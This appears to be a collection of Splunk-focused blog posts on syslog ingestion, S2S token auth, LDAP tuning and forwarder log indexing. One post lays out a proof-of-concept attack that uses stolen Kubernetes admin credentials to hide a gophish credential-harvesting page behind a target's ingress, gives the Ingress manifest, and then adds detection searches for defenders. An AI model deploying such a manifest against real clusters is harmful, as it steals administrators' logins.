Syslog server you say

I’ve had quite a bit to say about syslog as a component of a streaming data architecture primarily feeding Splunk Enterprise (or Enterprise Cloud). In seven days I will be presenting the culmination of small developments that have taken shape into the brand new Splunk Connect for Syslog (SC4S).

You don’t have to wait swing over via Splunk Base https://splunkbase.splunk.com/app/4740/#/details

SC4S is designed to:

Do the heavy lifting of deploying a functioning current build of the awesome syslog-ng OSE (3.24.1 as of this posting).

Support many popular syslog vendor products OOB with zero configuration or as little configuration as a host glob or IP address

Scale your Splunk vertically by very evenly distributing events across indexers by the second

Scale your syslog-ng servers by reducing constrains on CPU and disk

Reduce your exposure to data loss by minimizing the amount of data at rest on the syslog-ng instance

Promote great practices and collaboration. SC4S is a liberally licensed open source solution. We will be able to collaborate directly with the end users on filters and usage to promote great big data deployments.

Personal thanks to many but especially Mark Bonsack and Balazs Scheidler (syslog-ng creator)

Bias in ML

One day perhaps we can teach machines to avoid bias but maybe just maybe we need to understand how to teach humans the same first.

https://tech.slashdot.org/story/19/08/16/1916202/the-algorithms-that-detect-hate-speech-online-are-biased-against-black-people

It shouldn’t be a news flash that bias people “train” bias into computers just like we train bias into our children. We will one day realize we have no other choice but hard continuous work to eliminate bias.

Phishing from someone else’s container ship.

This is a theoretical attack abusing a compromised kubectl certificate pair and exposed K8s api to deploy a phishing site transparently on your targets infrastructure. This is a difficult attack to pull off and required existing compromised administrative access to the k8s cluster. A privileged insider, or compromised cert based authentication credential can be used.

  • Target www.spl.guru which is one of my test domains.
  • Desired outcome detect an attempt to intercept admin login for a wordpress site we will utilize a fake email alert informing the administrator a critical update must be applied.
  • We will deploy the site hidden behind the targets existing ingress controller, this allows us utilize the customers own domain and certificates eliminating detection by domain name (typo squatting etc) and certificate transparency reporting monitoring.

Phase one: Recon

Using kubectl identify name spaces and find the ingress controller used for the site you intended to compromise. For the purposes of my poc my target used a very obvious “wordpress” namespace.

kubectl -n wordpress get ing

NAME HOSTS ADDRESS PORTS AGE

site www.spl.guru 133a0685-wordpress-site-62d9-1332557661.us-east-1.elb.amazonaws.com 8020h

Phase two: deploy gophish

I’m not going to go into details on deploying gophish and setting up or sending the phishing emails. Thats beyond the scope of the blog post, I’m here to help the blue team so lets get on to detection.

The following manifest hides the gophish instance on a path under the main site url. Of note in this case /wplogin.cgi” is the real site while /wplogin is where we are credential harvesting.

apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: “site”
namespace: wordpress
annotations:
kubernetes.io/ingress.class: alb
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/tags: Environment=dev,Team=test
alb.ingress.kubernetes.io/certificate-arn: arn:aws:acm:us-east-1:174701313045:certificate/15d484c8-ca0c-4194-a4ef-f38a43b7b977
alb.ingress.kubernetes.io/listen-ports: ‘[{“HTTP”: 80}, {“HTTPS”:443}]’
alb.ingress.kubernetes.io/actions.ssl-redirect: ‘{“Type”: “redirect”, “RedirectConfig”: { “Protocol”: “HTTPS”, “Port”: “443”, “StatusCode”: “HTTP_301”}}’
# external-dns.alpha.kubernetes.io/hostname: search.gdi.spl.guru.,master.gdi.spl.guru.
spec:
rules:
– host: www.spl.guru
http:
paths:
– path: /wplogin
backend:
serviceName: gophish
servicePort: 80
– path: /
backend:
serviceName: wordpress
servicePort: 80

Phase three: Detecting what we did.

Using the K8S events and meta data onboard using Splunk Connect for K8S we have some solid places we can monitor for abuse. Side note don’t get hung up on “gophish” this is a hammer type tool your opponent may be much more subtle

  • Modification to an ingress in my case AWS ALB, ingress records for most will not change often when they are changed an associated approved deployment should also exist.

“kubernetes.io/ingress-name:” sourcetype=”kube:container:alb-ingress-controller” modifying

  • New Image, New Image Repository, New Registry, maintain a list of approved images and registries alert when an image is used not on the pre-defined list, this . may be noisy in dev clusters for no prod clusters reporting may be better than alerting.

index=em_meta “spec.containers{}.image”=”*”

 

“Safely” Exposing Splunk S2S to the internet

Splunk has a great token based auth solution for its S2S protocol it was added several versions back. Inputs have both just worked and remained unchanged for so long many administrators have not noticed the feature. This allows you to safely expose indexers or heavy forwarders so that UFs on the internet can forward data back in without VPN. This is super critical for Splunk endpoints that don’t require a connection to the corporate network via VPN constantly

When a Splunk input is exposed to the internet there is a risk of resource exhaustion dos. A simple type of attack where junk data or “well formed but misleading” data is feed to Splunk until all CPU/memory/disk is consumed.

Once this feature is enabled all UF/HF clients must supply a token to be allowed to connect if your adding this feature to a running Splunk deployment be ready to push the outputs.conf update and inputs.conf updates in close succession to prevent a data flow break.

Update your inputs.conf as follows, note you can use multiple tokens just like HEC so you can mitigate the number of tokens that need to be replaced if a stolen token is used in a DOS attack

# Access control settings.
[splunktcptoken://<token name>]
* Use this stanza to specify forwarders from which to accept data.
* You must configure a token on the receiver, then configure the same
  token on forwarders.
* The receiver discards data from forwarders that do not have the
  token configured.
* This setting is enabled for all receiving ports.
* This setting is optional.

token = <string>
* token should match regex [A-Za-Z0-9\-]+ and with a min length of 12

Update outputs.conf  use the token value of choice from inputs.conf

[tcpout:<target_group>]
token = <string>
* The access token for receiving data.
* If you configured an access token for receiving data from a forwarder,
  Splunk software populates that token here.
* If you configured a receiver with an access token and that token is not
  specified here, the receiver rejects all data sent to it.
* This setting is optional.
* No default.

Keeping that up with MaxMind for Splunk and Splunk Cloud

This is a rather long time coming, today version 4.0.0 of SecKit for Geolocation with MaxMind is available for Splunk via Splunk base and Splunk cloud. This version includes a built in solution for keeping the database files up to date for both free and paid subscribers. Free subscribers are of course limited to the basic information available as equivalent to the built in iplocation command from Splunk. Commercial subscribers can use all of available fields from their licensed files. Jump over to Splunk base to check it out https://splunkbase.splunk.com/app/3022/

To HEC with syslog – All grown up

A few years ago flying across the Atlantic, unable to sleep, I had an idea to integrate common syslog aggregation servers using Splunk’s new HTTP event Collector rather than file and the tired and true Universal Forwarder. This little idea implemented in python started solving real problems of throughput and latency while reducing the complexity of configuring syslog aggregation servers. I’m very pleased to say the python script I created is now obsolete. Leading syslog server products syslog-ng and rsyslog upstreams have implemented maintained modules. Even more exciting Mark Bonsack has invested considerable time to further develop modular configuration for both to make getting data though syslog and into Splunk even easier!

Native syslog –> http event collector modules

Modular Configuration Repositories

Quick Public Service Notice

While all linux distributions include a syslog server this should NOT be used as the production syslog aggregation solution. Linux distros are often many point releases or worse selectively back port patches based only on their own customer reported issues. Before attempting to build a syslog aggregation solution for production it is critical you source current upstream binaries or build your own.

Is your LDAP Slow? It might make your Splunk Slow

I’ve had this crop up enough times, I think its worth a short post. Most Splunk deployments use local and/or LDAP authentication. LDAP configuration is something of a black art and often the minimal configuration that works is the first and last time this is considered. It is worth your time as an administrator to optimize your LDAP configuration or better yet move to the more secure and reliable SAML standard.

Things to consider

  • Stop using LDAP and use SAML
  • LDAP authentication should never be enabled on indexers. If you have enabled LDAP authentication remove this. Indexers rarely require authentication, when required only applicable to admins and then under very strict conditions.
  • Ensure the Group BIND and Group Filters are both in use and limit the groups to only those required for Splunk access management
  • Ensure the User BIND and User Filters are appropriate to limit the potential users to only those users who may login to Splunk.
  • Validate the number of users returned by the LDAP query used is under 1000 or increase the number of precached users via limits.conf to an appropriate number.
  • Ensure DNSMASQ or an alternative DNS cache client is installed on Linux Search Heads and Indexers.

Stages to LDAP Auth

  • Interactive User Login (ad-hoc search) or scheduled report execution
  • Check User Cache if not cached or cache expired
  • DNS lookup to resolve the LDAP host to IP (This is the reason DNS Cache on linux is important)
  • TCP Connection to LDAP Server
  • Post query for specific user to LDAP
  • Wait for response
  • Process Referrals if applicable by repeating the above sequence

The time taken for each DNS query and LDAP query is added to the time taken too login to the Splunk UI, execute an ad-hoc search OR scheduled report. Its important to ensure the DNS and LDAP infrastructure is highly available and able to service potentially thousands of requests per second. Proper use of caching ensures resources on the Splunk Server including TCP client sessions are not exhausted causing users to wait in line for their turn at authentication or worst case time outs and authorization failures.

 

 

Redirecting _internal for a large forwarder deployment

Sometimes it is not noticed because there is no license charge associated with Splunk’s Universal forwarder internal logs and in some cases heavy forwarders. In very large deployments this can be a significant portion of storage used per day. Do you really need to keep those events around as long as the events associated with the Splunk Enterprise instances probably not.

License Warning – Updated

It has been pointed out this change WILL impact license on recent versions of Splunk in older versions and customers with EAA agreements in place this is OK. If you are on a recent (not sure which version) this change will impact license.

Warning!

The following changes will disable the Splunk Monitoring consoles built in forwarder monitoring feature. You can customize the searches but be aware this is not upgrade safe.

Second Warning!

If you have any custom forwarder monitoring searches/dashboards/alerts they may be impacted.

Define an index

The index we need to define is _internal_forwarder the following sample configuration will allow us to keep about 3 days of data from our forwarders adjust according to need.

[_internal_forwarder]
maxWarmDBCount = 200
frozenTimePeriodInSecs = 259200
quarantinePastSecs = 459200
homePath = $SPLUNK_DB/$_index_name/db
coldPath = $SPLUNK_DB/$_index_name/colddb
thawedPath = $SPLUNK_DB/$_index_name/thaweddb
maxHotSpanSecs = 43200
maxHotBuckets = 10

Change the index for internal logs

We need to create a new “TA” named “Splunk_TA_splunkforwarder we will CAREFULLY use the DS to push this to forwarders only. DO NOT push this to any Splunk Enterprise instance (CM/LM/MC/SH/IDX/deployer/ds) but you may push this to a “heavy” or intermediate forwarder. The app only needs two files in default app.conf and inputs.conf

#app.conf
[install]
state_change_requires_restart = true
is_configured = 0
state = enabled
build = 2

[launcher]
author = Ryan Faircloth
version = 1.0.0

[ui]
is_visible = 0
label = Splunk_UF Inputs

[package]
id = Splunk_TA_splunkforwarder
#inputs.conf
[monitor://$SPLUNK_HOME/var/log/splunk]
index = _internal_forwarder

Check our Work

First lets check positive make sure UFs have moved to the new index, we should get results.

index=_internal_forwarder source=*splunkforwarder*

Second lets check the negative make sure only UF logs got moved we should get no results

index= _internal_forwarder source=*splunk* NOT source=*splunkforwarder*

Updates

  • Index definition example used “_internal” rather than “_internal_uf”
  • renamed app to “Splunk_TA_splunkforwarder
  • renamed index to _internal_forwarder